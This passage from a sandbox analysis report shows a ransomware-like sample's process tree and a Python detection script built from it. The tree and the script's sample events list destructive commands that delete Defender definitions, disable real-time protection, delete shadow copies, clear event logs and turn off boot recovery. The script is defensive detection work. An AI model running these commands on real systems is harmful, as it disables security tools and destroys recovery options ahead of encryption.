    Command line: cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    - C:\Program Files\Windows Defender\MpCmdRun.exe (PID 2056)
      Command line: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      Signatures: Deletes Windows Defender Definitions
  - C:\Windows\system32\cmd.exe (PID 2068)
    Command line: cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2088)
      Command line: powershell Set-MpPreference -DisableIOAVProtection $true
      Signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\cmd.exe (PID 2164)
    Command line: cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2184)
      Command line: powershell Set-MpPreference -DisableRealtimeMonitoring $true
      Signatures: Suspicious behavior: EnumeratesProcesses
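The Signatures section and the process tree above describe one pre-encryption tamper sequence driven from PID 964: stop and disable backup-related services with net/sc, neutralise Defender through policy keys, service Start values, scheduled tasks, MpCmdRun and Set-MpPreference, delete shadow copies with vssadmin and wmic, clear the three main event logs with wevtutil, and disable recovery with bcdedit. The Python below is a worked example added to this page, not code from the sandbox; it turns those observed command lines into detection logic that a process-creation log could be run through. The command lines are copied from the tree; the event record shape (pid, ppid, cmdline), the rule names, the ATT&CK technique IDs chosen for each rule (T1489 Service Stop, T1562.001 Impair Defenses, T1490 Inhibit System Recovery, T1070.001 Clear Windows Event Logs), the parent-grouping threshold and the benign control line are this example's own assumptions.

```python
import re
from collections import Counter, defaultdict

SAMPLE = "33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe"

# Constructed sample events. The command lines are copied from the process
# tree above; the record shape (pid, ppid, cmdline) is an assumption modelled
# on a Sysmon Event ID 1 / Security 4688 entry, not the sandbox's own format.
EVENTS = [
    {"pid": 964,  "ppid": 600,  "cmdline": '"C:\\Users\\Admin\\AppData\\Local\\Temp\\' + SAMPLE + '"'},
    {"pid": 1264, "ppid": 964,  "cmdline": 'net.exe stop "NetMsmqActivator" /y'},
    {"pid": 1368, "ppid": 964,  "cmdline": 'net.exe stop "VSS" /y'},
    {"pid": 844,  "ppid": 964,  "cmdline": 'sc.exe config "VSS" start= disabled'},
    {"pid": 1576, "ppid": 964,  "cmdline": 'reg.exe add "HKLM\\Software\\Policies\\Microsoft\\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f'},
    {"pid": 1916, "ppid": 964,  "cmdline": 'reg.exe add "HKLM\\System\\CurrentControlSet\\Services\\WinDefend" /v "Start" /t REG_DWORD /d "4" /f'},
    {"pid": 960,  "ppid": 964,  "cmdline": 'schtasks.exe /Change /TN "Microsoft\\Windows\\Windows Defender\\Windows Defender Scheduled Scan" /Disable'},
    {"pid": 528,  "ppid": 964,  "cmdline": 'vssadmin.exe delete shadows /all /quiet'},
    {"pid": 656,  "ppid": 964,  "cmdline": 'wmic.exe shadowcopy delete'},
    {"pid": 1416, "ppid": 964,  "cmdline": 'wevtutil.exe cl security'},
    {"pid": 1220, "ppid": 964,  "cmdline": 'bcdedit.exe /set {default} recoveryenabled no'},
    {"pid": 2056, "ppid": 1540, "cmdline": '"C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -RemoveDefinitions -All'},
    {"pid": 2184, "ppid": 2164, "cmdline": 'powershell Set-MpPreference -DisableRealtimeMonitoring $true'},
    # Benign control (constructed): routine service administration must not fire.
    {"pid": 3000, "ppid": 2900, "cmdline": 'net.exe start "Spooler"'},
]

# (rule name, ATT&CK technique, pattern over the command line); rule names and
# the technique mapping are this example's choices.
RULES = [
    ("service_stop",       "T1489",     r"\bnet1?(?:\.exe)?\s+stop\s+"),
    ("service_disabled",   "T1562.001", r"\bsc(?:\.exe)?\s+config\s+.*\bstart=\s*disabled\b"),
    ("defender_policy",    "T1562.001", r"\breg(?:\.exe)?\s+(?:add|delete)\s+\"?HKLM\\Software\\Policies\\Microsoft\\Windows Defender"),
    ("service_start_4",    "T1562.001", r"\breg(?:\.exe)?\s+add\s+\"?HKLM\\System\\CurrentControlSet\\Services\\[^\"\s]+\"?\s+/v\s+\"?Start\"?\s+/t\s+REG_DWORD\s+/d\s+\"?4\"?"),
    ("defender_task_off",  "T1562.001", r"\bschtasks(?:\.exe)?\s+/Change\s+/TN\s+\"Microsoft\\Windows\\(?:Windows Defender|ExploitGuard)\\[^\"]+\"\s+/Disable\b"),
    ("defender_defs_gone", "T1562.001", r"MpCmdRun(?:\.exe)?\"?\s+-RemoveDefinitions\s+-All\b"),
    ("defender_pref_off",  "T1562.001", r"\bSet-MpPreference\s+-Disable\w+\s+\$true\b"),
    ("shadow_copy_delete", "T1490",     r"\b(?:vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete)\b"),
    ("recovery_disabled",  "T1490",     r"\bbcdedit(?:\.exe)?\s+/set\s+\{default\}\s+(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b"),
    ("eventlog_cleared",   "T1070.001", r"\bwevtutil(?:\.exe)?\s+cl\s+\w+"),
]
COMPILED = [(name, tech, re.compile(pat, re.IGNORECASE)) for name, tech, pat in RULES]


def classify(cmdline):
    """Return (rule_name, technique) for the first rule matching cmdline, else None."""
    for name, technique, rx in COMPILED:
        if rx.search(cmdline):
            return name, technique
    return None


def summarize(events):
    """Count matched events per ATT&CK technique."""
    counts = Counter()
    for ev in events:
        hit = classify(ev["cmdline"])
        if hit is not None:
            counts[hit[1]] += 1
    return counts


def tamper_sequences(events, min_behaviours=3):
    """Group hits by the parent that spawned them. A parent whose children cover
    at least min_behaviours distinct behaviours, one of them recovery inhibition
    (T1490), is reported as a pre-encryption tamper sequence. The threshold is a
    tuning choice for this example, not a value taken from the report."""
    names_by_parent = defaultdict(set)
    techs_by_parent = defaultdict(set)
    for ev in events:
        hit = classify(ev["cmdline"])
        if hit is None:
            continue
        names_by_parent[ev["ppid"]].add(hit[0])
        techs_by_parent[ev["ppid"]].add(hit[1])
    return {
        ppid: sorted(names)
        for ppid, names in names_by_parent.items()
        if len(names) >= min_behaviours and "T1490" in techs_by_parent[ppid]
    }


if __name__ == "__main__":
    print(dict(summarize(EVENTS)))
    for ppid, names in tamper_sequences(EVENTS).items():
        print(f"parent PID {ppid}: {', '.join(names)}")
```

Grouping by parent rather than alerting on each line is what keeps this useful: a single `vssadmin delete shadows` or `wevtutil cl` can be an administrator, but eight distinct tamper behaviours from one parent, including shadow-copy deletion, is the pattern this report shows. The MpCmdRun and Set-MpPreference children are launched through intermediate cmd.exe processes (PIDs 1540, 2068, 2164), so a grouping keyed only on the direct parent misses them; resolving the grandparent back to PID 964 would attach them to the same sequence.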
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: f2bde13962b7bcce5d9fc35a61c054af
  SHA1: 28dbbccdda3c3c74cb63c01fd53bb625bdd7bb4f
  SHA256: 834eea2f9f3e618c1bc50b3b934682f33269edb94c3f1aa5ad99e1708a40891b
  SHA512: 6fd44341268f41157480941c1f5b75b0ce0742cfc63f6f8c9978bc22239b923918cc5ae7881ed099b3f8bcd201e935232a19a5e7c918cc499039bb4cbf383eeb